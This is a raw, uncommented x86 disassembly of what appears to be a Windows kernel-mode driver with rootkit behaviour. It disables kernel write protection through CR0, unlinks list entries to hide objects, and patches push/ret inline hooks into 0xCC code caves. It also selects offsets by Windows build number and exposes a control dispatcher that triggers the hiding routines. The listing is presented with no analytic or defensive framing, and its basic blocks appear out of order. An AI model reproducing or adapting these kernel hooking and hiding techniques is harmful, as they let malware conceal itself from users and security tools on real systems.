sub_10480
add [ eax ] al
add [ eax ] al
add [ eax ] al
mov edi edi
push ebp
mov ebp esp
mov ecx [ ebp + 0xc ]
and [ ecx + 0x18 ] 0x0
and [ ecx + 0x1c ] 0x0
xor dl dl
call [ 0x12514 ]
xor eax eax
pop ebp
retn 0x8
sub_104aa
mov edi edi
push ebp
mov ebp esp
mov ecx [ ebp + 0xc ]
mov eax [ ecx + 0x60 ]
cmp [ eax + 0xc ] 0x8000c004
je 0x104c9
push esi
mov esi [ ecx + 0x18 ]
xor dl dl
call [ 0x12514 ]
mov eax esi
pop esi
pop ebp
retn 0x8
and [ ecx + 0x1c ] 0x0
mov [ ecx + 0x18 ] 0xc0000010
sub_104e2
mov eax [ 0x12ee8 ]
push esi
mov esi [ eax + 0x4 ]
call 0x10a98
call 0x10bc0
call 0x11f28
jmp 0x10508
test esi esi
jne 0x104fc
mov eax esi
mov esi [ esi + 0xc ]
push eax
call [ 0x1250c ]
pop esi
retn 0x4
sub_10516
mov edi edi
push ebp
mov ebp esp
push ecx
and [ ebp - 0x4 ] 0x0
push esi
mov esi [ ebp + 0x8 ]
lea eax [ ebp - 0x4 ]
push eax
push 0x0
push 0x100
push 0x22
push 0x12600
push 0x0
push esi
mov [ 0x12ee8 ] esi
call [ 0x12508 ]
test eax eax
jl 0x105b2
pop esi
leave
retn 0x8
call 0x1131e
call 0x10cb4
push esi
call 0x108fa
call 0x12108
call 0x10d00
test al al
je 0x105b7
call 0x10a98
call 0x10bc0
push [ ebp - 0x4 ]
call [ 0x1250c ]
mov eax 0xc0000001
jmp 0x105b2
call 0x10dca
test al al
je 0x105b7
mov eax [ 0x12f14 ]
movzx eax [ eax ]
mov [ 0x12f2c ] eax
call 0x11b84
test al al
jne 0x10592
call 0x11ee4
mov eax 0x10486
mov [ esi + 0x40 ] eax
mov [ esi + 0x38 ] eax
mov [ esi + 0x70 ] 0x104aa
mov [ esi + 0x34 ] 0x104e2
xor eax eax
cmp [ 0x12f2c ] 0x1770
jb 0x105b7
sub_105d6
mov edi edi
push ebp
mov ebp esp
mov ecx [ ebp + 0x8 ]
push ebx
xor ebx ebx
xor al al
cmp ecx ebx
je 0x10666
pop ebx
pop ebp
retn 0x4
push esi
mov esi [ ecx + 0x14 ]
cmp esi ebx
je 0x10665
pop esi
mov ecx [ esi + 0x4 ]
mov edx [ esi ]
cmp ecx ebx
je 0x10665
cmp edx ebx
je 0x10665
mov [ ecx ] edx
mov [ edx + 0x4 ] ecx
cli
mov eax cr0
and eax 0xfffeffff
mov cr0 eax
movzx eax [ esi + 0x24 ]
push eax
push ebx
push [ esi + 0x28 ]
call 0x1234e
movzx eax [ esi + 0x2c ]
push eax
push ebx
push [ esi + 0x30 ]
call 0x1234e
xor eax eax
add esp 0x18
mov [ esi + 0x2c ] ax
mov [ esi + 0x24 ] ax
mov [ esi + 0x1c ] ebx
mov [ esi + 0x18 ] ebx
mov [ esi + 0x3c ] ebx
mov [ esi ] ebx
mov [ esi + 0x4 ] ebx
mov eax cr0
or eax 0x10000
mov cr0 eax
sti
mov ecx [ esi + 0x14 ]
mov esi [ esi + 0x10 ]
mov al 0x1
cmp ecx ebx
je 0x10665
cmp esi ebx
je 0x10665
mov [ ecx ] esi
mov [ esi + 0x4 ] ecx
sub_10670
mov edi edi
push ebp
mov ebp esp
push edi
mov edi [ ebp + 0xc ]
xor eax eax
mov [ edi ] eax
mov ecx [ 0x12f18 ]
cmp ecx eax
je 0x106af
pop edi
pop ebp
retn 0x8
mov edx [ ebp + 0x8 ]
cmp edx eax
je 0x106af
mov ecx [ ecx ]
add ecx [ 0x12eec ]
je 0x106af
push esi
mov esi [ ecx + 0x4 ]
cmp esi [ ecx ]
je 0x106ae
pop esi
sub edx esi
lea ecx [ edx - 0x1 ]
mov al 0x1
cmp ecx 0x3e
ja 0x106ae
mov [ edi ] edx
sub_106ba
mov edi edi
push ebp
mov ebp esp
xor eax eax
cmp [ ebp + 0x8 ] eax
je 0x106f8
pop ebp
retn 0x8
mov edx [ ebp + 0xc ]
cmp edx eax
je 0x106f8
mov ecx [ edx + 0x4 ]
cmp ecx edx
je 0x106f8
push esi
mov edx [ ecx + 0x4 ]
mov ecx [ ecx ]
mov [ edx ] ecx
mov al 0x1
mov [ ecx + 0x4 ] edx
mov ecx [ ecx + 0x4 ]
cmp ecx edx
jne 0x106d5
mov esi [ 0x12ef0 ]
add esi ecx
cmp esi [ ebp + 0x8 ]
je 0x106eb
jmp 0x106f7
pop esi
sub_10702
mov edi edi
push ebp
mov ebp esp
sub esp 0x2c
xor eax eax
mov [ ebp - 0x14 ] ax
push ebx
push edi
lea edi [ ebp - 0x12 ]
stosd [ edi ]
stosw [ edi ]
xor ebx ebx
xor eax eax
mov [ ebp - 0x2c ] ebx
lea edi [ ebp - 0x28 ]
stosd [ edi ]
stosd [ edi ]
stosd [ edi ]
stosd [ edi ]
stosd [ edi ]
mov edi [ ebp + 0x10 ]
mov [ ebp - 0x1 ] bl
mov [ ebp - 0x8 ] ebx
mov [ ebp - 0xc ] ebx
cmp edi ebx
je 0x107e9
mov al [ ebp - 0x1 ]
pop edi
pop ebx
leave
retn 0xc
cmp [ ebp + 0x8 ] ebx
je 0x107e9
push [ ebp + 0x8 ]
lea eax [ ebp - 0x14 ]
push eax
call [ 0x124a0 ]
lea eax [ ebp - 0x14 ]
mov [ ebp - 0x24 ] eax
lea eax [ ebp - 0x2c ]
push eax
push 0x1
lea eax [ ebp - 0x8 ]
push eax
mov [ ebp - 0x2c ] 0x18
mov [ ebp - 0x28 ] ebx
mov [ ebp - 0x20 ] 0x240
mov [ ebp - 0x1c ] ebx
mov [ ebp - 0x18 ] ebx
call [ 0x1249c ]
test eax eax
jl 0x107ce
mov ecx [ ebp - 0xc ]
cmp ecx ebx
je 0x107db
push ebx
lea eax [ ebp - 0xc ]
push eax
push ebx
push ebx
push 0x1
push [ ebp - 0x8 ]
call [ 0x12498 ]
test eax eax
jl 0x107ce
cmp [ ebp - 0x8 ] ebx
je 0x107e9
call [ 0x12494 ]
mov eax [ ebp + 0xc ]
mov ecx [ ebp - 0xc ]
lea ecx [ ecx + eax * 4 ]
push esi
mov esi [ ecx ]
mov edx esi
mov eax edx
cmp edx ebx
je 0x107c9
push [ ebp - 0x8 ]
call [ 0x124d0 ]
mov [ ebp - 0x1 ] 0x1
pop esi
cmp edi [ eax + 0x4 ]
je 0x107b9
cmp eax ebx
je 0x107c9
mov edx eax
mov eax [ eax ]
cmp eax ebx
jne 0x107ac
cmp eax esi
mov eax [ eax ]
jne 0x107c7
mov [ edx ] eax
mov [ ecx ] eax
jmp 0x107c9
sub_107f8
mov edi edi
push ebp
mov ebp esp
push ecx
push ecx
push ebx
push esi
mov esi [ ebp + 0x8 ]
xor ebx ebx
cmp esi ebx
je 0x108e9
mov al [ 0x12ef6 ]
pop esi
pop ebx
leave
retn 0x4
cmp [ 0x12ef6 ] bl
jne 0x108e9
push edi
push [ esi + 0xc ]
mov [ ebp - 0x4 ] ebx
mov [ ebp - 0x8 ] ebx
call 0x1105e
mov edi eax
cmp edi ebx
je 0x1084d
lea eax [ ebp - 0x4 ]
push eax
push [ esi + 0xc ]
call 0x11030
mov [ ebp + 0xb ] al
cli
mov eax cr0
and eax 0xfffeffff
mov cr0 eax
movzx eax [ esi + 0x1c ]
push eax
push ebx
push [ esi + 0x20 ]
call 0x1234e
mov eax [ esi + 0x18 ]
movzx ecx [ eax + 0xc ]
push ecx
push ebx
push [ eax + 0x10 ]
call 0x1234e
add esp 0x18
mov [ esi + 0x24 ] ebx
cmp [ ebp - 0x8 ] ebx
jbe 0x108a2
mov eax 0x53445352
sub eax [ edi ]
cmp eax 0x1
jae 0x1084d
pop edi
cmp [ ebp + 0xb ] bl
je 0x108b7
push [ ebp - 0x8 ]
add edi 0x18
push ebx
push edi
call 0x1234e
add esp 0xc
lea eax [ edi + 0x18 ]
lea edx [ eax + 0x1 ]
mov eax cr0
or eax 0x10000
mov cr0 eax
sti
mov eax [ esi + 0x4 ]
mov [ esi + 0xc ] ebx
mov [ esi + 0x10 ] ebx
cmp eax ebx
je 0x108e2
push [ ebp - 0x4 ]
push ebx
push [ esi + 0xc ]
call 0x1234e
add esp 0xc
mov cl [ eax ]
inc eax
cmp cl bl
jne 0x10841
sub eax edx
mov [ ebp - 0x8 ] eax
mov [ 0x12ef6 ] 0x1
xor ecx ecx
mov [ eax ] cx
mov eax [ esi + 0x4 ]
mov [ eax + 0x2 ] cx
mov eax [ esi + 0x4 ]
mov [ eax + 0x2c ] ebx
sub_108fa
mov edi edi
push ebp
mov ebp esp
push ecx
push ecx
cmp [ 0x12ef4 ] 0x0
je 0x10911
push esi
mov esi [ ebp + 0x8 ]
test esi esi
jne 0x10920
mov al 0x1
jmp 0x109cf
mov eax [ 0x124a4 ]
movzx eax [ eax ]
mov [ 0x12ef4 ] 0x1
cmp eax 0x893
je 0x1096b
xor al al
jmp 0x109ce
leave
retn 0x4
mov [ 0x12eec ] 0x38
cmp eax 0xa28
je 0x1096b
pop esi
push 0x12ef0
push esi
call 0x10670
mov [ 0x12ef5 ] al
test al al
je 0x109c9
lea eax [ ebp - 0x8 ]
push eax
call 0x10ef8
mov [ 0x12ef8 ] eax
cmp eax 0xece
je 0x1096b
mov al [ 0x12ef4 ]
cmp [ 0x12ef0 ] 0x1
jae 0x109c9
cmp eax 0x176f
jbe 0x10962
mov [ 0x12ef0 ] 0x28
mov [ 0x12ef4 ] 0x0
jmp 0x10975
cmp eax 0x1772
jbe 0x10959
push edi
xor eax eax
mov [ ebp - 0x8 ] ax
lea edi [ ebp - 0x6 ]
stosd [ edi ]
stosw [ edi ]
lea eax [ ebp - 0x8 ]
push eax
lea eax [ esi + 0x1c ]
push eax
call 0x10f74
pop edi
test al al
je 0x109a2
and [ 0x12eec ] 0x0
jmp 0x10975
cmp eax 0x1db0
jne 0x10962
sub_109d8
mov edi edi
push ebp
mov ebp esp
push ebx
push edi
mov edi [ ebp + 0x8 ]
xor bl bl
test edi edi
je 0x10a3e
pop edi
mov al bl
pop ebx
pop ebp
retn 0x4
cmp [ 0x12f18 ] 0x0
je 0x10a3e
cmp [ 0x12f1c ] 0x0
je 0x10a3e
push edi
call 0x108fa
test al al
je 0x10a3e
cmp [ 0x12ef5 ] bl
je 0x10a3e
mov eax [ 0x12f18 ]
mov eax [ eax ]
push esi
mov esi [ 0x12eec ]
add eax esi
push eax
push edi
call 0x106ba
mov bl al
test bl bl
je 0x10a3d
pop esi
mov eax [ 0x12f1c ]
mov eax [ eax ]
add eax esi
push eax
push [ edi + 0x4 ]
call 0x106ba
mov bl al
sub_10a4c
mov edi edi
push ebp
mov ebp esp
push esi
mov esi [ ebp + 0x8 ]
xor al al
test esi esi
je 0x10a8e
pop esi
pop ebp
retn 0x4
mov ecx [ 0x12ef8 ]
cmp ecx 0xffffffff
je 0x10a8e
cmp ecx 0x25
jae 0x10a8e
push esi
push ecx
push 0x1237c
call 0x10702
test al al
je 0x10a8e
push [ esi + 0x4 ]
push [ 0x12ef8 ]
push 0x1236c
call 0x10702
sub_10a98
mov edi edi
push ebp
mov ebp esp
sub esp 0x10
mov eax [ 0x12ee0 ]
xor eax ebp
mov [ ebp - 0x4 ] eax
mov eax [ 0x12efc ]
cmp eax 0x1
jae 0x10ab8
and [ ebp - 0x10 ] 0x0
mov edx [ 0x124a8 ]
push esi
xor esi esi
mov al 0x1
jmp 0x10b28
inc esi
cmp esi 0x37
jl 0x10ac5
cmp [ edx + esi - 0x5 ] 0xe8
je 0x10adf
mov ecx [ ebp - 0x4 ]
xor ecx ebp
call 0x1230d
leave
retn
lea ecx [ edx + esi ]
cmp [ ecx ] 0x28c25d
jne 0x10ad7
jmp 0x10b25
lea esi [ ecx - 0x4 ]
mov edx [ esi ]
cmp edx 0x1
jb 0x10b25
xor al al
pop esi
push edi
sub eax ecx
mov [ ebp - 0x10 ] eax
push 0x4
lea eax [ ebp - 0x10 ]
push eax
push esi
lea edi [ ecx + edx ]
call 0x11132
test eax eax
jl 0x10b24
pop edi
push 0x6
lea eax [ ebp - 0xc ]
push eax
push edi
mov [ ebp - 0xc ] 0xcccccccc
mov [ ebp - 0x8 ] 0xcc
mov [ ebp - 0x7 ] 0xcc
call 0x11132
and [ 0x12efc ] 0x0
sub_10b3a
mov edi edi
push ebp
mov ebp esp
push ecx
mov eax [ 0x12efc ]
mov [ ebp - 0x4 ] 0xc0000001
cmp eax 0x1
jb 0x10bb4
mov eax [ ebp - 0x4 ]
leave
retn 0x2c
push ebx
mov ebx [ ebp + 0x1c ]
push esi
mov esi [ ebp + 0x24 ]
push edi
push [ ebp + 0x30 ]
mov edi [ ebp + 0x20 ]
push [ ebp + 0x2c ]
push [ ebp + 0x28 ]
push esi
push edi
push ebx
push [ ebp + 0x18 ]
push [ ebp + 0x14 ]
push [ ebp + 0x10 ]
push [ ebp + 0xc ]
push [ ebp + 0x8 ]
call eax
mov [ ebp - 0x4 ] eax
test eax eax
jne 0x10bb1
pop edi
pop esi
pop ebx
mov eax [ 0x124a4 ]
movzx eax [ eax ]
push esi
push edi
push ebx
cmp eax 0x1770
jae 0x10b9a
call 0x11892
call 0x11836
jmp 0x10b9f
push [ ebp + 0x18 ]
push ebx
push [ ebp + 0x28 ]
push esi
push edi
call 0x1147e
test al al
je 0x10bb1
sub_10bc0
mov edi edi
push ebp
mov ebp esp
sub esp 0x10
mov eax [ 0x12ee0 ]
xor eax ebp
mov [ ebp - 0x4 ] eax
xor eax eax
inc eax
cmp [ 0x12f00 ] eax
jb 0x10c32
mov ecx [ ebp - 0x4 ]
xor ecx ebp
call 0x1230d
leave
retn
mov eax [ 0x12f08 ]
mov [ ebp - 0x10 ] eax
push 0x4
lea eax [ ebp - 0x10 ]
push eax
push [ 0x12f04 ]
call 0x11132
test eax eax
jl 0x10c30
xor al al
push 0x6
lea eax [ ebp - 0xc ]
push eax
push [ 0x12f0c ]
mov [ ebp - 0xc ] 0xcccccccc
mov [ ebp - 0x8 ] 0xcc
mov [ ebp - 0x7 ] 0xcc
call 0x11132
xor eax eax
mov [ 0x12f00 ] eax
mov [ 0x12f0c ] eax
mov [ 0x12f04 ] eax
mov [ 0x12f08 ] eax
sub_10c44
mov edi edi
push ebp
mov ebp esp
mov ecx [ 0x12f00 ]
mov eax 0xc0000001
cmp ecx 0x1
jb 0x10c70
pop ebp
retn 0x14
cmp [ ebp + 0x8 ] 0xfffffffe
jne 0x10c74
pop ebp
jmp ecx
cmp [ ebp + 0xc ] 0x0
jne 0x10c74
push [ ebp + 0x14 ]
push [ ebp + 0x10 ]
call 0x113e6
sub_10c7c
mov edi edi
push ebp
mov ebp esp
mov ecx [ 0x12f00 ]
mov eax 0xc0000001
cmp ecx 0x1
jb 0x10ca8
pop ebp
retn 0x10
cmp [ ebp + 0x8 ] 0xfffffffe
jne 0x10cac
pop ebp
jmp ecx
cmp [ ebp + 0xc ] 0x0
jne 0x10cac
push [ ebp + 0x14 ]
push [ ebp + 0x10 ]
call 0x113e6
sub_10cb4
mov edi edi
push ebp
mov ebp esp
push ecx
push ecx
cmp [ 0x12f10 ] 0x0
je 0x10cc8
push edi
xor eax eax
mov [ ebp - 0x8 ] ax
lea edi [ ebp - 0x6 ]
stosd [ edi ]
stosw [ edi ]
push 0x1238c
lea eax [ ebp - 0x8 ]
push eax
call [ 0x124a0 ]
lea eax [ ebp - 0x8 ]
push eax
call [ 0x124ac ]
test eax eax
mov [ 0x12f10 ] eax
setne al
pop edi
leave
retn
mov al 0x1
leave
retn
sub_10d00
mov edi edi
push ebp
mov ebp esp
sub esp 0xc
cmp [ 0x12efc ] 0x0
mov [ ebp - 0x1 ] 0x0
jbe 0x10d1e
mov eax [ 0x124a8 ]
and [ ebp - 0x8 ] 0x0
mov [ ebp - 0xc ] eax
xor ecx ecx
push esi
mov [ ebp - 0x1 ] 0x1
jmp 0x10dbf
inc ecx
cmp ecx 0x3c
jl 0x10d2d
movzx edx [ eax + ecx - 0x5 ]
sub edx 0xe8
test edx edx
jle 0x10d51
mov al [ ebp - 0x1 ]
leave
retn
lea esi [ eax + ecx ]
mov edx [ esi ]
sub edx 0x28c25d
jne 0x10d49
jmp 0x10dbe
push ebx
lea ebx [ esi - 0x4 ]
mov eax [ ebx ]
mov [ ebp - 0x8 ] eax
test eax eax
je 0x10dbd
pop esi
pop ebx
push edi
lea eax [ ebp - 0xc ]
push eax
push [ 0x124b0 ]
mov edi 0x10b3a
push edi
call 0x1121c
mov [ ebp - 0x1 ] al
test al al
jne 0x10d92
mov eax [ ebp - 0x8 ]
lea edi [ esi + eax ]
mov eax [ ebp - 0xc ]
sub eax esi
mov [ ebp - 0x8 ] eax
push 0x4
lea eax [ ebp - 0x8 ]
push eax
push ebx
call 0x11132
test eax eax
jge 0x10db6
lea eax [ ebp - 0xc ]
push eax
push [ 0x12f10 ]
push edi
call 0x1121c
mov [ ebp - 0x1 ] al
test al al
je 0x10dbc
mov [ 0x12efc ] edi
mov [ ebp - 0x1 ] 0x0
jmp 0x10dbc
pop edi
sub_10dca
mov edi edi
push ebp
mov ebp esp
sub esp 0xc
push esi
xor esi esi
mov [ ebp - 0x1 ] 0x0
cmp [ 0x12f00 ] esi
jbe 0x10dea
mov eax [ 0x124b8 ]
or [ ebp - 0xc ] 0xffffffff
mov ecx [ 0x124a4 ]
mov [ ebp - 0x8 ] eax
movzx ecx [ ecx ]
push ebx
push edi
cmp ecx 0x1770
jae 0x10e6f
mov [ ebp - 0x1 ] 0x1
jmp 0x10eed
push 0xe95dec8b
push esi
push 0x10
push eax
call 0x110e6
mov [ ebp - 0xc ] eax
cmp eax 0xffffffff
je 0x10eeb
mov eax [ ebp - 0x8 ]
add eax esi
cmp [ eax ] 0xe8
je 0x10e22
mov al [ ebp - 0x1 ]
pop esi
leave
retn
pop edi
pop ebx
mov ecx [ ebp - 0x8 ]
lea esi [ ecx + eax + 0x8 ]
lea edi [ esi - 0x4 ]
mov eax [ edi ]
mov [ ebp - 0xc ] eax
lea ebx [ esi + eax ]
lea eax [ ebp - 0x8 ]
push eax
push [ 0x124b4 ]
push 0x10c7c
mov [ ebp - 0xc ] esi
push eax
call 0x11d38
add esi eax
cmp esi 0x37
jl 0x10e09
mov eax [ ebp - 0x8 ]
sub eax esi
mov [ ebp - 0xc ] eax
mov eax [ edi ]
mov [ 0x12f08 ] eax
push 0x4
lea eax [ ebp - 0xc ]
push eax
push edi
call 0x11132
test eax eax
jge 0x10ed7
mov ecx [ ebp - 0x8 ]
lea esi [ ecx + eax + 0x5 ]
lea edi [ esi - 0x4 ]
mov eax [ edi ]
mov [ ebp - 0xc ] eax
lea ebx [ esi + eax ]
lea eax [ ebp - 0x8 ]
push eax
push [ 0x124b4 ]
push 0x10c44
call 0x1121c
mov [ ebp - 0x1 ] al
test al al
jne 0x10eb2
jmp 0x10e25
mov eax [ ebp - 0x8 ]
mov [ 0x12f04 ] edi
mov [ 0x12f0c ] eax
mov [ 0x12f00 ] ebx
mov [ ebp - 0x1 ] 0x0
jmp 0x10eeb
lea eax [ ebp - 0x8 ]
push eax
push [ 0x12f10 ]
push 0x10c44
jmp 0x10ea6
mov eax [ ebp - 0xc ]
cmp eax 0xffffffff
je 0x10eeb
call 0x1121c
mov [ ebp - 0x1 ] al
test al al
je 0x10eeb
sub_10ef8
mov edi edi
push ebp
mov ebp esp
push edi
mov edi [ ebp + 0x8 ]
test edi edi
jne 0x10f0a
mov ax [ edi ]
mov ecx 0xfffe
push ebx
and ax cx
push esi
xor ecx ecx
xor esi esi
xor ebx ebx
cmp cx ax
jae 0x10f5d
or eax 0xffffffff
jmp 0x10f6a
push 0x25
pop ecx
mov eax esi
xor edx edx
div ecx
pop esi
pop ebx
mov eax edx
mov ecx [ edi + 0x4 ]
movzx eax bx
movzx eax [ ecx + eax * 2 ]
mov ecx esi
imul esi esi 0x3
shr ecx 0x1
add esi ecx
cmp eax 0x61
jb 0x10f49
pop edi
pop ebp
retn 0x4
add esi eax
jmp 0x10f51
cmp eax 0x7a
jbe 0x10f4d
mov ax [ edi ]
inc ebx
shr ax 0x1
cmp bx ax
jb 0x10f22
lea esi [ esi + eax - 0x20 ]
push eax
call [ 0x124bc ]
movzx eax ax
sub_10f74
mov edi edi
push ebp
mov ebp esp
push edi
mov edi [ ebp + 0x8 ]
xor eax eax
cmp edi eax
je 0x10fe7
pop edi
pop ebp
retn 0x8
mov ecx [ ebp + 0xc ]
cmp ecx eax
je 0x10fe7
xor edx edx
push esi
mov [ ecx + 0x4 ] eax
mov [ ecx + 0x2 ] dx
mov [ ecx ] dx
mov esi [ edi + 0x4 ]
cmp esi eax
je 0x10fe6
pop esi
movzx edx [ edi ]
cmp dx 0x2
jb 0x10fe6
shr dx 0x1
dec dx
push ebx
movzx edx dx
jmp 0x10fc2
cmp dx ax
ja 0x10fb2
movzx ebx dx
cmp [ esi + ebx * 2 ] 0x5c
je 0x10fc9
jmp 0x10fca
inc edx
add edx 0xffff
movzx ebx dx
lea esi [ esi + ebx * 2 ]
mov [ ecx + 0x4 ] esi
lea esi [ edx + edx ]
mov dx [ edi ]
sub dx si
mov al 0x1
mov [ ecx + 0x2 ] dx
mov [ ecx ] dx
pop ebx
sub_10ff2
mov edi edi
push ebp
mov ebp esp
push esi
push edi
mov edi [ ebp + 0x8 ]
push edi
xor esi esi
call [ 0x124c0 ]
test al al
je 0x11022
pop edi
mov eax esi
pop esi
pop ebp
retn 0x4
mov eax 0x5a4d
cmp ax [ edi ]
jne 0x11022
mov esi [ edi + 0x3c ]
add esi edi
cmp [ esi ] 0x4550
je 0x11022
xor esi esi
sub_11030
mov edi edi
push ebp
mov ebp esp
push esi
mov esi [ ebp + 0xc ]
push [ ebp + 0x8 ]
and [ esi ] 0x0
call 0x10ff2
test eax eax
jne 0x1104c
mov eax [ eax + 0x54 ]
mov [ esi ] eax
mov al 0x1
xor al al
jmp 0x11053
pop esi
pop ebp
retn 0x8
sub_1105e
mov edi edi
push ebp
mov ebp esp
push ecx
and [ ebp - 0x4 ] 0x0
push edi
mov edi [ ebp + 0x8 ]
push edi
call 0x10ff2
test eax eax
je 0x110d8
mov eax [ ebp - 0x4 ]
pop edi
leave
retn 0x4
push esi
lea esi [ eax + 0xa8 ]
cmp [ esi + 0x4 ] 0x1
jb 0x110d7
pop esi
mov eax [ esi ]
test eax eax
je 0x110d7
push ebx
mov ebx [ 0x124c0 ]
add edi eax
push edi
call ebx
test al al
je 0x110d6
pop ebx
mov eax [ esi + 0x4 ]
push 0x1c
xor edx edx
pop esi
div esi
xor ecx ecx
test eax eax
jbe 0x110d6
cmp [ edi + 0xc ] 0x2
je 0x110b7
cmp ecx eax
jae 0x110d6
inc ecx
add edi 0x1c
cmp ecx eax
jb 0x110a9
mov edi [ edi + 0x14 ]
cmp edi 0x1
jb 0x110d6
mov eax [ ebp + 0x8 ]
add edi eax
push edi
mov [ ebp - 0x4 ] edi
call ebx
test al al
jne 0x110d6
and [ ebp - 0x4 ] 0x0
sub_110e6
mov edi edi
push ebp
mov ebp esp
mov edx [ ebp + 0xc ]
or eax 0xffffffff
cmp edx 0x4
jb 0x11125
or eax 0xffffffff
mov ecx [ ebp + 0x10 ]
cmp ecx edx
jae 0x11125
add edx 0xfffffffc
push edi
or eax 0xffffffff
mov edi [ ebp + 0x8 ]
add edi eax
mov edi [ edi + ecx ]
cmp edi [ ebp + 0x14 ]
jne 0x11101
pop ebp
retn 0x10
add eax ecx
jmp 0x11128
inc eax
lea edi [ eax + ecx ]
cmp edi edx
ja 0x11118
jmp 0x1111b
pop edi
cmp eax 0xffffffff
je 0x11128
sub_11132
mov edi edi
push ebp
mov ebp esp
push ecx
push ecx
push ebx
push esi
push [ ebp + 0x8 ]
mov esi 0xc0000001
mov [ ebp - 0x8 ] esi
call [ 0x124c0 ]
test al al
je 0x1120f
mov eax esi
xor ebx ebx
cmp [ ebp + 0xc ] ebx
je 0x1120f
cmp [ ebp + 0x10 ] ebx
je 0x1120f
push ebx
push ebx
push ebx
push [ ebp + 0x10 ]
push [ ebp + 0x8 ]
call [ 0x124d8 ]
mov esi eax
cmp esi ebx
je 0x1120a
mov eax [ ebp - 0x8 ]
jmp 0x11211
push edi
push esi
call [ 0x124d4 ]
mov edi [ 0x12510 ]
or [ esi + 0x6 ] 0x1
push 0x10
push ebx
push ebx
push 0x2
push ebx
push esi
call edi
mov [ ebp - 0x4 ] eax
cmp eax ebx
jne 0x111c6
pop esi
pop ebx
leave
retn 0xc
call [ 0x12484 ]
mov ecx [ ebp + 0x10 ]
mov [ ebp + 0xb ] al
cmp ecx ebx
jbe 0x111e7
push 0x10
push ebx
push ebx
push 0x1
push ebx
push esi
call edi
mov [ ebp - 0x4 ] eax
cmp eax ebx
jne 0x111c6
mov cl [ ebp + 0xb ]
call [ 0x12488 ]
and [ esi + 0x6 ] 0xfffe
push esi
push [ ebp - 0x4 ]
call [ 0x124cc ]
mov [ ebp - 0x8 ] ebx
mov edx [ ebp - 0x4 ]
mov edi [ ebp + 0xc ]
sub edi edx
push 0x10
push ebx
push ebx
push ebx
push ebx
push esi
call edi
mov [ ebp - 0x4 ] eax
cmp eax ebx
je 0x11202
mov al [ edi + edx ]
mov [ edx ] al
inc edx
dec ecx
jne 0x111de
push esi
call [ 0x124c8 ]
pop edi
sub_1121c
mov edi edi
push ebp
mov ebp esp
sub esp 0x14
mov eax [ 0x12ee0 ]
xor eax ebp
mov [ ebp - 0x4 ] eax
mov eax [ ebp + 0x10 ]
and [ eax ] 0x0
cmp [ ebp + 0x8 ] 0x0
push ebx
push esi
mov esi [ ebp + 0xc ]
mov [ ebp - 0x14 ] eax
mov [ ebp - 0xd ] 0x0
mov ebx esi
je 0x11305
mov ecx [ ebp - 0x4 ]
mov al [ ebp - 0xd ]
pop esi
xor ecx ebp
pop ebx
call 0x1230d
leave
retn 0xc
test esi esi
je 0x11305
push edi
mov edi [ 0x124c0 ]
push esi
call edi
test al al
je 0x11304
pop edi
add esi 0x1000
push esi
call edi
test al al
je 0x11304
mov [ ebp - 0xe ] 0x0
mov esi 0x1000
lea eax [ ecx + 0x8 ]
cmp eax esi
ja 0x112cb
add ebx 0xfffff000
push ebx
call edi
test al al
je 0x11304
or ecx 0xffffffff
movzx eax [ ecx + ebx + 0x4 ]
cmp eax 0xcccc
je 0x112ce
cmp [ ebp - 0xe ] 0x0
jne 0x11304
xor eax eax
lea edi [ ebp - 0xb ]
stosd [ edi ]
stosb [ edi ]
mov eax [ ebp + 0x8 ]
mov [ ebp - 0xb ] eax
push 0x6
lea eax [ ebp - 0xc ]
lea esi [ ecx + ebx ]
push eax
push esi
mov [ ebp - 0xc ] 0x68
mov [ ebp - 0x7 ] 0xc3
call 0x11132
test eax eax
jl 0x11304
cmp ecx 0xffffffff
je 0x11304
lea eax [ ecx + 0x4 ]
cmp eax esi
jb 0x11282
mov [ ebp - 0xe ] 0x1
jmp 0x11280
mov eax [ ebp - 0x14 ]
mov [ eax ] esi
mov [ ebp - 0xd ] 0x1
push 0xcccccccc
push eax
push esi
push ebx
call 0x110e6
mov ecx eax
cmp ecx 0xffffffff
jne 0x112af
jmp 0x11304
xor eax eax
sub_1131e
mov edi edi
push ebp
mov ebp esp
push ecx
push ecx
push ebx
push esi
mov esi [ 0x124a0 ]
push edi
xor eax eax
mov [ ebp - 0x8 ] ax
lea edi [ ebp - 0x6 ]
stosd [ edi ]
stosw [ edi ]
push 0x123de
lea eax [ ebp - 0x8 ]
push eax
xor bl bl
call esi
mov edi [ 0x124ac ]
lea eax [ ebp - 0x8 ]
push eax
call edi
mov [ 0x12f18 ] eax
test eax eax
je 0x11399
pop edi
pop esi
mov al bl
pop ebx
leave
retn
push 0x123b8
lea eax [ ebp - 0x8 ]
push eax
call esi
lea eax [ ebp - 0x8 ]
push eax
call edi
mov [ 0x12f1c ] eax
test eax eax
je 0x11378
push 0x1239c
lea eax [ ebp - 0x8 ]
push eax
call esi
lea eax [ ebp - 0x8 ]
push eax
call edi
cmp [ 0x12f1c ] 0x0
mov [ 0x12f14 ] eax
je 0x11399
inc bl
mov bl 0x1
sub_113a6
mov edi edi
push ebp
mov ebp esp
mov ecx [ ebp + 0x8 ]
xor eax eax
cmp ecx eax
je 0x113dd
pop ebp
retn 0x8
cmp [ ebp + 0xc ] 0xb
jb 0x113dd
mov edx [ 0x124a4 ]
movzx edx [ edx ]
cmp edx 0xece
ja 0x113dd
push ecx
cmp [ ecx + 0xa ] al
je 0x113d8
call 0x1203c
call 0x11f50
jmp 0x113dd
sub_113e6
mov edi edi
push ebp
mov ebp esp
mov eax [ ebp + 0x8 ]
push esi
mov esi 0xc0000001
test eax eax
je 0x11471
mov eax esi
pop esi
pop ebp
retn 0x8
mov edx [ ebp + 0xc ]
cmp edx 0x8
jb 0x11471
mov ecx [ eax + 0x4 ]
push edi
lea edi [ ecx + 0x9 ]
inc edx
cmp edi edx
pop edi
ja 0x11471
mov edx [ eax ]
cmp edx 0x1000
je 0x11461
push ecx
add eax 0x8
push eax
call 0x11916
cmp edx 0x2000
je 0x11433
xor esi esi
push [ 0x12ee8 ]
call 0x105d6
push [ 0x12ee8 ]
call 0x109d8
push [ 0x12ee8 ]
call 0x10a4c
push [ 0x12ee8 ]
call 0x107f8
jmp 0x1146b
cmp edx 0x4000
jne 0x11471
test al al
je 0x11471
push ecx
add eax 0x8
push eax
call 0x113a6
jmp 0x1146b
sub_1147e
mov edi edi
push ebp
mov ebp esp
sub esp 0xd0
push ebx
mov ebx [ ebp + 0x10 ]
xor edx edx
cmp ebx edx
je 0x1182c
pop ebx
leave
retn 0x14
cmp [ ebp + 0xc ] 0x1
jb 0x1182c
mov eax [ ebp + 0x18 ]
